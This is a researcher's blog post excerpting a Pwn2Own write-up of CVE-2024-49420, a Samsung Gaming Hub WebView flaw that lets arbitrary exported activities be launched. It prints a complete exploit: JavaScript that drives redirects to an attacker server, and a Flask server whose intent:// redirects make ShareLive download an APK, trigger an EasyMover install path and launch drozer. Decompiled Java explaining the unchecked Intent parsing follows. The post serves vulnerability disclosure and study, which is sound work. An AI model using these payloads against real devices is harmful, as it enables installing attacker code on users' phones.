Malicious Erection LLC

Samsung GamingHub Arbitrary Launch Activity - CVE-2024-49420

The below snippet is taken from the full white paper, available here: https://maliciouserection.com/2025/05/13/pwn2own-ireland-2024-samsung-s24-attack-chain-whitepaper.html

I think you should read the white paper instead :)

Exploit Payload

Two payloads are used for this bug. The first payload is the HTML content that is hosted at the URL https://us.mcsvc.samsung.com.maliciouserection.com?yayattackeryay=<attackerServer>. Due to bugs 1 and 2, the Gaming Hub WebView will load and execute the below HTML code.

yaytrampolineyay
<script>

// get hostname and port
var yayquerystringyay = window.location.search;
var yayurlparamsyay = new URLSearchParams(yayquerystringyay);
var yayattackeryay = yayurlparamsyay.get('yayattackeryay');

// open sharelive to start awareservice
location.href="http://" + yayattackeryay + "/yaylaunchshareliveyay";

// redirect after 2 seconds
const yayshorttimeoutyay = setTimeout(yaystartyay, 2000);

// open sharelive and retrieve file
function yaystartyay() {
        location.href="http://" + yayattackeryay + "/yayshareliveyay";
}

// redirect after 15 seconds
const yaytimeoutyay = setTimeout(yayfinalyay, 15000);

// redirect to launch easymover agent
function yayfinalyay() {
        location.href="http://" + yayattackeryay + "/yayfinalyay";

        // redirect after another 15 seconds
        const yaytimeout2yay = setTimeout(yaylaunchyay, 15000);
}

// launch drozer
function yaylaunchyay() {
        location.href="http://" + yayattackeryay + "/yaylaunchyay";
}

</script>

The second payload is a Python script that is hosted at an attacker controlled server. There is no IP address or domain requirements for this web server, as long as the server can be reached via HTTP/S.

By running the below Python script, the attacker will run a Flask based web server:

from flask import Flask, redirect, url_for, send_from_directory

app = Flask(__name__)

# Route for serving index.html
@app.route('/')
def index():
    return send_from_directory('', 'index.html')

# redirect to open com.sec.android.easyMover.Agent
@app.route('/yayfinalyay')
def yayfinalyay():
    return redirect("intent://#Intent;component=com.sec.android.easyMover.Agent/.ui.SsmUpdateCheckActivity;action=com.sec.android.easyMover.Agent.WATCH_INSTALL_SMART_SWITCH;S.MODE=DIALOG;S.ssm_action=yayactionyay;S.ssm_uri=%63%6f%6e%74%65%6e%74%3a%2f%2f%63%6f%6d%2e%73%61%6d%73%75%6e%67%2e%67%70%75%77%61%74%63%68%61%70%70%2e%48%74%6d%6c%44%75%6d%70%50%72%6f%76%69%64%65%72%2f%79%61%79%2e%61%70%6b;end;", code=302)

# launch sharelive to stare aware service
@app.route('/yaylaunchshareliveyay')
def yaylaunchshareliveyay():
    return redirect("intent://#Intent;component=com.samsung.android.app.sharelive/.presentation.main.MainActivity;end;", code=302)

# sharelive to download yay.apk to arbitrary location
@app.route('/yayshareliveyay')
def yayshareliveyay():
    yayqrcodeyay = "88AKqZwy2Hmr"
    return redirect("intent://qr.quickshare.samsungcloud.com/" + yayqrcodeyay + "#Intent;component=com.samsung.android.app.sharelive/com.samsung.android.app.sharelive.presentation.applink.QrCodeAppLinkActivity;scheme=https;end;", code=302)

# launch drozer
@app.route('/yaylaunchyay')
def yaylaunchyay():
    return redirect("intent://#Intent;component=com.yaydevhackmodyay.drozer/com.mwr.dz.activities.MainActivity;end;", code=302)

# pichu dancing
@app.route('/pichu-dance.gif')
def pichuDance():
    return send_from_directory('', 'pichu-dance.gif')

if __name__ == '__main__':
    context = ('cert.pem', 'key.pem')
    app.run(debug=True, port=8000, host="0.0.0.0")

Exploit Details

Continuing to exploit the Gaming Hub application, the loaded WebView contains code that will execute different actions based on the type of data that is received from the loaded web server.

When the WebView receives a 302 Redirect code from the web server, the class com.samsung.android.game.gamehome.gmp.ui.web.o method shouldOverrideUrlLoading(WebView, WebResourceRequest) is executed. From there, the redirection URL is analyzed.

If the redirection URL has a scheme value of intent://, then the URL is passed to class com.samsung.android.game.gamehome.gmp.ui.web.GmpWebActivity method f(Uri, int).

public final class o extends WebViewClient {
    public final p a; // interface linked with GmpWebActivity
...
    public boolean shouldOverrideUrlLoading(WebView view, WebResourceRequest request) {
        boolean q;
        ...
        String yayschemeyay = request.getUrl().getScheme();
        Uri yayurlyay = request.getUrl();
        ...
        q = o.q("intent", yayschemeyay, true); // checks if first 2 objects match
        if (q) {
            this.a.f(url, a(yayurlyay)); // checks if the url authority value is either `instantplays` or `cloudgame`
            return true;
        }

Class GmpWebActivity method f(Uri, int) takes the incoming URL and passes it to Android’s internal Intent parser. The Intent parser is commonly used to craft Intent objects based on the incoming URI value. After the Intent object is created, startActivity(Intent) is executed against the Intent object.

public final class GmpWebActivity extends s implements n, p {
...
    public void f(Uri yayurlyay, int i) {
        Intent yayintentyay = Intent.parseUri(yayurlyay.toString(), 0);
        yayintentyay.addFlags(i);
        ...
        a.b(a, this, yayintentyay, false, 2, null);
    }
... 

public final class a {
...
    public static boolean b(a a, Context context, Intent yayintentyay, boolean z, int i, Object obj) {
        ...
        return a.a(context, yayintentyay, z);
    }
    ...
    public final boolean a(Context context, Intent yayintentyay, boolean z) {
        ...
        try {
            context.startActivity(yayintentyay);
            return true;
        ...
    }

BUG 3 – Start Arbitrary Exported Activities

If the web server sends a 302 Redirect HTTP code with a redirect URL starting with intent://, the WebView in Gaming Hub can be forced to start arbitrary activities.

In our exploit chain, the URL https://us.mcsvc.samsung.com.maliciouserection.com?yayattackeryay=<attackerServer> contains HTML code which runs JavaScript. This JavaScript forces the WebView to make a GET request to the attacker controlled server, defined by the GET parameter “".

An attacker should run the previously mentioned Python script, which will host the web server at “". This Python script simply returns a `302 Redirect HTTP` code, along with different URIs with `intent://` schemes.

For example, if a GET request is made to “http:///yaylaunchshareliveyay", the Python script will return a 302 Redirect HTTP code with the following URI:

intent://#Intent;component=com.samsung.android.app.sharelive/.presentation.main.MainActivity;end;

When the Gaming Hub WebView receives this URI, it will:

  • Pass the URI to Android’s internal Intent parser
  • Craft an Intent object based on the URI
  • Run startActivity(Intent) against the Intent Object

The rest of this exploit chain heavily relies on the ability to launch arbitrary exported Activities due to sending different 302 Redirect URIs.